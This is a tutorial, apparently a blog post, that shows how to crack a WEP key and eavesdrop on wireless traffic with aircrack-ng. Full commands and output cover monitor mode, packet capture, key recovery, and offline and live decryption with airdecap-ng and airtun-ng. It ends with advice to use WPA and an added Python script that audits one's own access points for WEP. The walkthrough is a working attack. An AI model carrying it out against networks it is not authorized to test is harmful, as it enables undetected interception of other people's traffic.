Cracking a WEP key is said to be extremely easy, a matter of a few seconds. True? Pretty much. We are also going to decrypt traffic in real time, without ever needing to connect to the wireless access point.
All steps are run as the root super-user, since the state of the interfaces needs to be changed.
To start with
Download and install aircrack-ng. It’s available on most Linux distributions in a package format.
On Debian, run
apt-get install aircrack-ng
Aircrack-ng provides tools to capture packets, crack the WEP key and decrypt live traffic.
We'll run the tests with a Linksys PCMCIA wifi card. A simple ifconfig displays the card's network stats, which tells us it has been detected.
root@crack_WEP:~# ifconfig
lo        Interface doesn't support scanning.
wlan0     Link encap:Ethernet  HWaddr 00:1a:70:6b:37:4e
          UP BROADCAST MULTICAST  MTU:1500  Metric:1
          RX packets:22 errors:0 dropped:0 overruns:0 frame:0
          TX packets:63 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:3742 (3.7 KB)  TX bytes:10773 (10.7 KB)
Capture packets
The interface needs to be switched to monitor mode.
root@crack_WEP:~# airmon-ng

Interface       Chipset         Driver

wlan0           Broadcom 43xx   b43 - [phy0]

Airmon-ng has detected interface wlan0. It could have a different name of course, such as ath0 for instance.
root@crack_WEP:~# airmon-ng stop wlan0

Interface       Chipset         Driver

wlan0           Broadcom 43xx   b43 - [phy0]
                                (monitor mode disabled)

root@crack_WEP:~# airmon-ng start wlan0

Interface       Chipset         Driver

wlan0           Broadcom 43xx   b43 - [phy0]
                                (monitor mode enabled on mon0)
Running iwconfig shows mon0 has been added in addition to the original interface wlan0:
root@crack_WEP:~# iwconfig
wlan0     IEEE 802.11bg  ESSID:""
          Mode:Managed  Frequency:2.412 GHz  Access Point: Not-Associated
          Tx-Power=27 dBm
          Retry min limit:7   RTS thr:off   Fragment thr=2352 B
          Encryption key:off
          Power Management:off
          Link Quality:0  Signal level:0  Noise level:0
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
          Tx excessive retries:0  Invalid misc:0   Missed beacon:0

mon0      IEEE 802.11bg  Mode:Monitor  Frequency:2.412 GHz  Tx-Power=27 dBm
          Retry min limit:7   RTS thr:off   Fragment thr=2352 B
          Encryption key:off
          Power Management:off
          Link Quality:0  Signal level:0  Noise level:0
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
          Tx excessive retries:0  Invalid misc:0   Missed beacon:0

We can now scan for available networks:
root@crack_WEP:~# airodump-ng mon0

 CH 10 ][ Elapsed: 4 s ][ 2009-08-08 18:01

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 00:A0:C5:FF:84:72  197        4        0    0   1  11   WEP  WEP         private

 BSSID              STATION            PWR   Rate  Lost  Packets  Probes
The scan results show an access point emitting on channel 1 with WEP encryption and MAC address 00:A0:C5:FF:84:72.
With the target now defined, we need to capture packets off the air:
root@crack_WEP:~# airodump-ng --channel 1 --bssid 00:A0:C5:FF:84:72 --write temp wlan0

 CH  1 ][ Elapsed: 31 mins ][ 2009-05-02 21:52

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 00:A0:C5:FF:84:72  205  10     6058    24496    0   1  54   WEP  WEP         private

 BSSID              STATION            PWR   Rate  Lost  Packets  Probes

 00:A0:C5:FF:84:72  00:18:4D:76:30:EB  188  54-54     0    24795

Packets are written to .cap files named with the temp prefix given to --write.
As cracking techniques get more efficient, there is a good chance of recovering a key with no more than 40000 packets using recent algorithms. Capture time varies with the amount of traffic on the air link.
Crack the WEP key
It's now time to crack the WEP key:
root@crack_WEP:~# aircrack-ng -z -b 00:A0:C5:FF:84:72 temp.cap-0*.cap

                                 Aircrack-ng 1.0 rc1

                 [00:00:22] Tested 240228 keys (got 41742 IVs)

   KB    depth   byte(vote)
    0    0/  1   B9(58880) A0(50688) 12(50176) F5(49920) 9E(48896) CD(48640)
    1    0/  1   19(54784) E8(52480) FA(52480) 4B(51456) 79(51456) DD(49664)
    2    0/  1   31(59648) EA(53504) 40(50688) 0A(50432) 88(50432) 0E(50176)
    3    0/  1   8C(60416) 05(49152) 56(49152) 23(48640) 52(48384) 03(48128)
    4    0/  1   B2(59136) AE(49664) 78(49152) FE(49152) 8B(48384) 9C(47616)
    5    0/  1   61(53504) E6(50688) FF(50176) 13(49664) 23(49408) C7(49408)
    6    0/  1   DD(56320) C4(51968) 90(50688) 0C(50176) CF(49920) CE(49152)
    7    0/  1   4E(53248) E6(51968) 7D(49152) 0B(48896) 90(48896) 06(48640)
    8    0/  1   FB(52224) C1(49664) E9(48128) 3D(47616) F0(47360) EB(47104)
    9    0/  1   0B(54784) BC(51712) 52(50432) 54(49920) F5(49920) CA(48896)
   10    0/  1   E6(50944) 1C(49920) 5F(49408) 1F(49152) 0A(48896) 83(48896)
   11    2/  1   FF(49664) 17(48384) 94(48128) 27(47872) 23(47616) B2(47616)
   12    0/  4   91(50452) A4(50360) 77(50156) 78(49540) FF(49476) 70(48788)

                 KEY FOUND! [ B9:19:31:8C:B2:61:DD:4E:FB:0B:AA:62:99 ]
        Decrypted correctly: 100%

That's right: the key was cracked in 22 seconds!
Decrypt the traffic
It is possible to capture traffic into .cap files as above, decrypt it into a second file and then hand that file to the tcpdump command, for instance:
root@crack_WEP:~# airdecap-ng -w b919318cb261dd4efb0baa6299 temp-01.cap
Total number of packets read         22072
Total number of WEP data packets      6245
Total number of WPA data packets         0
Number of plaintext data packets         3
Number of decrypted WEP  packets      6245
Number of corrupted WEP  packets         0
Number of decrypted WPA  packets         0
root@crack_WEP:~# tcpdump -r temp-01-dec.cap -i wlan
It is also possible to decrypt live traffic in real time, sending it to a virtual interface at0 on which we can listen as on any real interface. Airtun-ng, provided in the Aircrack-ng package, does exactly that.
root@crack_WEP:~# airtun-ng -a 00:A0:C5:FF:84:72 -w b919318cb261dd4efb0baa6299 mon0
created tap interface at0
WEP encryption specified.
Sending and receiving frames through mon0.
FromDS bit set in all frames.
From another shell:
crack_WEP:~# tcpdump -i at0
Conclusion
It is indeed very easy to crack a WEP key and listen to the traffic without associating to the access point, hence without being detected. Make sure to use at least WPA with non-dictionary passwords.
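The practical takeaway for a network owner is to find out whether any of their own access points still advertise WEP (or nothing at all). The following is an added example, not code from the original post or from the Aircrack-ng project: a small Python audit over the CSV that airodump-ng writes next to the .cap when --write is used. The column layout (BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key) is assumed from memory rather than taken from the post, and the sample file content is constructed.

```python
"""Flag access points still advertising WEP or no encryption in an
airodump-ng CSV. Added example: the column layout is assumed from the CSV
that airodump-ng writes with --write; the sample data below is constructed."""
import csv

# Constructed sample: AP section, blank line, then the station section
# that follows it in real files (we only inspect the AP section).
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:A0:C5:FF:84:72, 2009-08-08 18:01:00, 2009-08-08 18:01:04, 1, 11, WEP, WEP, , 197, 4, 0, 0. 0. 0. 0, 7, private,
00:11:22:33:44:55, 2009-08-08 18:01:00, 2009-08-08 18:01:04, 6, 54, WPA2, CCMP, PSK, 180, 12, 0, 0. 0. 0. 0, 6, office,
AA:BB:CC:DD:EE:FF, 2009-08-08 18:01:00, 2009-08-08 18:01:04, 11, 54, OPN, , , 150, 9, 0, 0. 0. 0. 0, 5, guest,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
00:18:4D:76:30:EB, 2009-08-08 18:01:00, 2009-08-08 18:01:04, 188, 24795, 00:A0:C5:FF:84:72,
"""

WEAK = {"WEP", "OPN"}  # privacy values that should not be seen on a managed network


def parse_access_points(text):
    """Return one dict per AP row; stops at the blank line ending the AP section."""
    aps, header = [], None
    for line in text.splitlines():
        if not line.strip():
            if header is not None:
                break  # end of AP section, station rows follow
            continue  # leading blank line in real files
        fields = [f.strip() for f in next(csv.reader([line]))]
        if header is None:
            header = fields
        else:
            aps.append(dict(zip(header, fields)))
    return aps


def weak_access_points(text, owned=None):
    """Return (bssid, essid, privacy) for APs using WEP or no encryption.
    If `owned` (a set of BSSIDs) is given, only those are reported, so the
    check stays an audit of the caller's own equipment."""
    found = []
    for ap in parse_access_points(text):
        if owned is not None and ap["BSSID"] not in owned:
            continue
        privacy = ap.get("Privacy", "").split(" ")[0]  # "WPA2 WPA" -> "WPA2"
        if privacy in WEAK:
            found.append((ap["BSSID"], ap["ESSID"], privacy))
    return found


if __name__ == "__main__":
    for bssid, essid, privacy in weak_access_points(SAMPLE_CSV):
        print(f"{bssid}  {essid!r}  {privacy}: migrate to WPA2/WPA3")
```

Pass the set of BSSIDs you administer as `owned` so the report covers only your own equipment.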